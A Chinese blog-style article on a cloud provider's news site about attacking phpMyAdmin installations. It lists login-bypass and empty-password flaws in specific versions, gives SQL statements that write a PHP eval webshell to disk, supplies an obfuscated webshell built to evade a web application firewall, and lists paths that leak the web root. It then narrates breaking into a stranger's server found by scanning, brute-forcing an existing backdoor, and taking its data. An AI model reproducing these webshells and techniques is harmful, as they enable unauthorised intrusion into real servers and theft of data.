溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

PHPmyadmin漏洞以及拿shell的示例分析

發(fā)布時間:2021-02-22 09:32:04 來源:億速云 閱讀:284 作者:小新 欄目:數(shù)據(jù)庫

小編給大家分享一下PHPmyadmin漏洞以及拿shell的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

phpmyadmin的漏洞相對來說,還是比較多的,對于新手來說,分享幾個漏洞,深入的處于代碼審計方面的也可以和我討論
phpmyadmin2.11.3-2.11.4 這兩個版本存在萬能密碼,直接使用‘localhost’@'@”為賬號,密碼不用輸入。

phpmyadmin2.11.9.2 這個版本存在空口令。直接root用戶登陸,密碼不用

找這個的話 用自己的寫的腳本,或者搜素引擎什么的,這里懂的人就懂了,不懂也不在這里。

關于拿shell,----》root權限,并且有寫文件權限 ----》導出的目錄有寫權限 ----》有的情況下,就算你這兩個都有,但是服務器的一些配置還是會對這個有影響。

在getshell之前先進入一個數(shù)據(jù)庫

第一種,使用sql語句,創(chuàng)建一個表,添加一個字段,字段的內(nèi)容為一句話,然后導出到php文件中,最后刪除這個表,這個是最保險的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('<?php eval($_POST[mima])?>')
select 列 from 表 into _utfile '路徑'
Drop TABLE IF EXISTS 表;
第二種方法,這個是直接寫入
select '一句話'INTO _UTFILE '路徑'
還有幾種方法,大致原理都一樣。
然后,一般的話,一句話都是

<?php @eval($_POST[x])?>

有狗的話,用免殺一句話,下面這個是我過年前構造的過狗一句話,現(xiàn)在應該還可以過

<?php
 $a = 's';
 $str = str_repeat($a,2);
 $to = $_POST;
 //echo $str;
 $exp = 'a'.$str[0].$str[1].'e'.'r'.'t';
 $exp($to['x'])
 ?>

找路徑的話,

1// 利用phpinfo.php
 2//利用phpmyadmin的一些文件報錯,下面都是網(wǎng)上通用的
 /phpMyAdmin/index.php?lang[]=1
 /phpMyAdmin/phpinfo.php
 /load_file()
 /phpmyadmin/themes/darkblue_orange/layout.inc.php
 /phpmyadmin/libraries/select_lang.lib.php
 /phpmyadmin/libraries/lect_lang.lib.php
 /phpmyadmin/libraries/mcrypt.lib.php
 /phpmyadmin/libraries/export/xls.php

3//再者就是利用網(wǎng)站包路徑,這些會的都會了,不會的慢慢的就會了。

下面開始實戰(zhàn),腳本掃到一個IP,顯示存在phpmyadmin,打開

PHPmyadmin漏洞以及拿shell的示例分析

一看這些php文件就是后門一句話,放到幾萬字典爆破,兩秒鐘

PHPmyadmin漏洞以及拿shell的示例分析

直接菜刀鏈接。。。。。
這個肯定被人搞了,直接打包好東西,你懂的。。。提權什么的就不必要了。

PHPmyadmin漏洞以及拿shell的示例分析

以上是“PHPmyadmin漏洞以及拿shell的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業(yè)資訊頻道!

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內(nèi)容。

AI